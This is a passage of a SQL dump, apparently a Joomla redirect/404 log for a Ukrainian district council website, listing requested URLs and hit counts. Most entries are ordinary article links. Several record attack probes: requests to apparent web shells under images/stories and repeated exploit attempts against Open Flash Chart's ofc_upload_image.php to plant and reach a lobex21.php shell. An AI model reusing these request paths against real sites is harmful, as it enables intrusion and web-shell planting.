00:00:00',301),(366,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=uk','','','',6,0,'2014-09-16 12:09:55','0000-00-00 00:00:00',301),(367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59:--20062014-&Itemid=107&lang=uk','','','',7,0,'2014-09-16 12:09:57','0000-00-00 00:00:00',301),(368,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:09:59','0000-00-00 00:00:00',301),(369,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:10:06','0000-00-00 00:00:00',301),(370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 12:10:12','0000-00-00 00:00:00',301),(371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 12:10:18','0000-00-00 00:00:00',301),(372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 12:10:24','0000-00-00 00:00:00',301),(373,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-16 12:10:32','0000-00-00 00:00:00',301),(374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk','','','',5,0,'2014-09-16 12:11:15','0000-00-00 00:00:00',301),(375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itнного бюджету  на 2014 рік</a></li><li><a href=','','','',28,0,'2014-09-16 12:11:17','0000-00-00 00:00:00',301),(376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 12:12:28','0000-00-00 00:00:00',301),(377,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 12:13:11','0000-00-00 00:00:00',301),(378,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1097:2013-09-25-08-35-50&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%C0%CD%C0%D2%CE%CB%B2%C9+%C6%D3%D0%C0%C2%D1%DC%CA%C8%C9+%C4%C5%CF%D3%D2%C0%D2','',4,0,'2014-09-16 12:14:16','0000-00-00 00:00:00',301),(379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&Itemid=14&lang=uk','','','',26,0,'2014-09-16 12:14:26','0000-00-00 00:00:00',301),(380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=uk','','','',15,0,'2014-09-16 12:19:27','0000-00-00 00:00:00',301),(381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=uk','','','',15,0,'2014-09-16 12:25:10','0000-00-00 00:00:00',301),(382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:--21022013-&Itemid=86&lang=uk','','','',11,0,'2014-09-16 12:32:07','0000-00-00 00:00:00',301),(383,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=ru','','','',7,0,'2014-09-16 12:42:52','0000-00-00 00:00:00',301),(384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=uk','','','',10,0,'2014-09-16 12:48:34','0000-00-00 00:00:00',301),(385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=en','','','',20,0,'2014-09-16 12:53:48','0000-00-00 00:00:00',301),(386,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:54:37','0000-00-00 00:00:00',301),(387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-16 12:55:48','0000-00-00 00:00:00',301),(388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en','','','',5,0,'2014-09-16 12:55:50','0000-00-00 00:00:00',301),(389,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=uk','','','',9,0,'2014-09-16 12:57:10','0000-00-00 00:00:00',301),(390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en','','','',6,0,'2014-09-16 12:57:12','0000-00-00 00:00:00',301),(391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk','','','',6,0,'2014-09-16 12:59:24','0000-00-00 00:00:00',301),(392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-16 12:59:39','0000-00-00 00:00:00',301),(393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:59:42','0000-00-00 00:00:00',301),(394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51:--19072013-&Itemid=92&lang=ru','','','',4,0,'2014-09-16 13:00:09','0000-00-00 00:00:00',301),(395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=uk','','','',16,0,'2014-09-16 13:00:17','0000-00-00 00:00:00',301),(396,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-16 13:00:53','0000-00-00 00:00:00',301),(397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 13:01:09','0000-00-00 00:00:00',301),(398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:--21022013-&Itemid=86&lang=en','','','',10,0,'2014-09-16 13:01:22','0000-00-00 00:00:00',301),(399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-16 13:01:47','0000-00-00 00:00:00',301),(400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&Itemid=14&lang=en','','','',26,0,'2014-09-16 13:02:01','0000-00-00 00:00:00',301),(401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47&Itemid=86&lang=uk','','','',15,0,'2014-09-16 13:13:11','0000-00-00 00:00:00',301),(402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-16 13:45:35','0000-00-00 00:00:00',301),(403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=uk','','','',9,0,'2014-09-16 13:46:23','0000-00-00 00:00:00',301),(404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 13:46:25','0000-00-00 00:00:00',301),(405,'http://www.malyn-rayrada.org.ua/images/stories/food.php?rf','','','',192,0,'2014-09-16 13:47:08','0000-00-00 00:00:00',301),(406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=ru','','','',5,0,'2014-09-16 13:47:15','0000-00-00 00:00:00',301),(407,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46&Itemid=85&lang=uk','','','',8,0,'2014-09-16 13:48:07','0000-00-00 00:00:00',301),(408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53&Itemid=94&lang=uk','','','',23,0,'2014-09-16 13:48:57','0000-00-00 00:00:00',301),(409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=uk','','','',14,0,'2014-09-16 13:51:45','0000-00-00 00:00:00',301),(410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=uk','','','',18,0,'2014-09-16 13:52:08','0000-00-00 00:00:00',301),(411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-16 13:53:51','0000-00-00 00:00:00',301),(412,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46&Itemid=85&lang=uk','','','',7,0,'2014-09-16 13:53:58','0000-00-00 00:00:00',301),(413,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 13:54:04','0000-00-00 00:00:00',301),(414,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22----&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',3,0,'2014-09-16 13:54:19','0000-00-00 00:00:00',301),(415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36&Itemid=70&lang=uk','','','',9,0,'2014-09-16 13:54:37','0000-00-00 00:00:00',301),(416,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49&Itemid=88&lang=uk','','','',8,0,'2014-09-16 13:54:48','0000-00-00 00:00:00',301),(417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=uk','','','',34,0,'2014-09-16 13:55:30','0000-00-00 00:00:00',301),(418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47&Itemid=86&lang=uk','','','',19,0,'2014-09-16 13:55:37','0000-00-00 00:00:00',301),(419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-16 13:55:43','0000-00-00 00:00:00',301),(420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-16 13:56:50','0000-00-00 00:00:00',301),(421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',20,0,'2014-09-16 13:58:00','0000-00-00 00:00:00',301),(422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=uk','','','',27,0,'2014-09-16 13:58:14','0000-00-00 00:00:00',301),(423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 13:58:27','0000-00-00 00:00:00',301),(424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 13:58:41','0000-00-00 00:00:00',301),(425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-16 13:58:48','0000-00-00 00:00:00',301),(426,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?baca','','','',99,0,'2014-09-16 13:59:05','0000-00-00 00:00:00',301),(427,'http://www.malyn-rayrada.org.ua/images/stories/explore.php?baca','','','',106,0,'2014-09-16 13:59:12','0000-00-00 00:00:00',301),(428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=en','','','',10,0,'2014-09-16 13:59:15','0000-00-00 00:00:00',301),(429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-16 13:59:17','0000-00-00 00:00:00',301),(430,'http://www.malyn-rayrada.org.ua/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',11,0,'2014-09-16 13:59:19','0000-00-00 00:00:00',301),(431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=en','','','',17,0,'2014-09-16 13:59:42','0000-00-00 00:00:00',301),(432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-16 13:59:45','0000-00-00 00:00:00',301),(433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53&Itemid=94&lang=uk','','','',10,0,'2014-09-16 13:59:51','0000-00-00 00:00:00',301),(434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-16 14:00:29','0000-00-00 00:00:00',301),(435,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-16 14:00:32','0000-00-00 00:00:00',301),(436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-16 14:00:40','0000-00-00 00:00:00',301),(437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-16 14:01:12','0000-00-00 00:00:00',301),(438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',22,0,'2014-09-16 14:01:16','0000-00-00 00:00:00',301),(439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-16 14:01:33','0000-00-00 00:00:00',301),(440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-16 14:01:55','0000-00-00 00:00:00',301),(441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',16,0,'2014-09-16 14:02:10','0000-00-00 00:00:00',301),(442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&Itemid=14&lang=uk','','','',25,0,'2014-09-16 14:02:12','0000-00-00 00:00:00',301),(443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=ru','','','',16,0,'2014-09-16 14:03:07','0000-00-00 00:00:00',301),(444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-16 14:03:08','0000-00-00 00:00:00',301),(445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=en','','','',11,0,'2014-09-16 14:03:12','0000-00-00 00:00:00',301),(446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:-21022013-&Itemid=86&lang=uk','','','',17,0,'2014-09-16 14:03:58','0000-00-00 00:00:00',301),(447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',15,0,'2014-09-16 14:04:42','0000-00-00 00:00:00',301),(448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-16 14:10:33','0000-00-00 00:00:00',301),(449,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46&Itemid=85&lang=en','','','',12,0,'2014-09-16 14:10:50','0000-00-00 00:00:00',301),(450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-16 14:11:04','0000-00-00 00:00:00',301),(451,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-16 14:13:03','0000-00-00 00:00:00',301),(452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=ru','','','',17,0,'2014-09-16 14:13:19','0000-00-00 00:00:00',301),(453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-16 14:14:23','0000-00-00 00:00:00',301),(454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57:--15042014-&Itemid=98&lang=ru','','','',14,0,'2014-09-16 14:14:24','0000-00-00 00:00:00',301),(455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=uk','','','',22,0,'2014-09-16 14:14:37','0000-00-00 00:00:00',301),(456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 14:15:26','0000-00-00 00:00:00',301),(457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',23,0,'2014-09-16 14:15:28','0000-00-00 00:00:00',301),(458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-16 14:15:30','0000-00-00 00:00:00',301),(459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-16 14:15:31','0000-00-00 00:00:00',301),(460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-16 14:16:33','0000-00-00 00:00:00',301),(461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=uk','','','',7,0,'2014-09-16 14:28:09','0000-00-00 00:00:00',301),(462,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',8,0,'2014-09-16 14:39:10','0000-00-00 00:00:00',301),(463,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',3,0,'2014-09-16 14:39:10','0000-00-00 00:00:00',301),(464,'http://www.malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',8,0,'2014-09-16 14:39:15','0000-00-00 00:00:00',301),(465,'http://www.malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',8,0,'2014-09-16 14:39:14','0000-00-00 00:00:00',301),(466,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',3,0,'2014-09-16 14:39:18','0000-00-00 00:00:00',301),(467,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',7,0,'2014-09-16 14:39:19','0000-00-00 00:00:00',301),(468,'http://www.malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/tmp-upload-images/lobex21.php?rf','','','',6,0,'2014-09-16 14:39:19','0000-00-00 00:00:00',301),(469,'http://www.malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/lobex21.php?rf','','','',10,0,'2014-09-16 14:39:26','0000-00-00 00:00:00',301),(470,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',2,0,'2014-09-16 14:39:30','0000-00-00 00:00:00',301),(471,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',34,0,'2014-09-16 14:40:03','0000-00-00 00:00:00',301),(472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&Itemid=14&lang=uk','','','',30,0,'2014-09-16 14:44:27','0000-00-00 00:00:00',301),(473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=en','','','',15,0,'2014-09-16 14:44:58','0000-00-00 00:00:00',301),(474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-16 14:45:15','0000-00-00 00:00:00',301),(475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-16 14:46:45','0000-00-00 00:00:00',301),(476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=ru','','','',13,0,'2014-09-16 14:47:19','0000-00-00 00:00:00',301),(477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-09-16 14:47:38','0000-00-00 00:00:00',301),(478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-16 14:47:41','0000-00-00 00:00:00',301),(479,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=en','','','',15,0,'2014-09-16 14:48:07','0000-00-00 00:00:00',301),(480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-16 14:48:10','0000-00-00 00:00:00',301),(481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-16 14:48:42','0000-00-00 00:00:00',301),(482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-16 14:48:45','0000-00-00 00:00:00',301),(483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=ru','','','',8,0,'2014-09-16 14:49:59','0000-00-00 00:00:00',301),(484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-16 14:50:06','0000-00-00 00:00:00',301),(485,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=uk','','','',14,0,'2014-09-16 14:50:44','0000-00-00 00:00:00',301),(486,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6&layout=blog&Itemid=9&lang=uk','','','',5,0,'2014-09-16 14:56:48','0000-00-00 00:00:00',301),(487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',9,0,'2014-09-16 14:56:58','0000-00-00 00:00:00',301),(488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-16 15:10:24','0000-00-00 00:00:00',301),(489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',19,0,'2014-09-16 15:16:23','0000-00-00 00:00:00',301),(490,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-16 15:17:54','0000-00-00 00:00:00',301),(491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',29,0,'2014-09-16 15:18:43','0000-00-00 00:00:00',301),(492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-16 15:21:50','0000-00-00 00:00:00',301),(493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-16 15:25:30','0000-00-00 00:00:00',301),(494,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-16 15:26:00','0000-00-00 00:00:00',301),(495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-16 15:26:03','0000-00-00 00:00:00',301),(496,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=ru','','','',17,0,'2014-09-16 15:26:58','0000-00-00 00:00:00',301),(497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=uk','','','',22,0,'2014-09-16 15:27:03','0000-00-00 00:00:00',301),(498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-16 15:27:07','0000-00-00 00:00:00',301),(499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-16 15:28:49','0000-00-00 00:00:00',301),(500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',15,0,'2014-09-16 15:31:33','0000-00-00 00:00:00',301),(501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=uk','','','',10,0,'2014-09-16 15:32:02','0000-00-00 00:00:00',301),(502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=uk','','','',7,0,'2014-09-16 15:32:52','0000-00-00 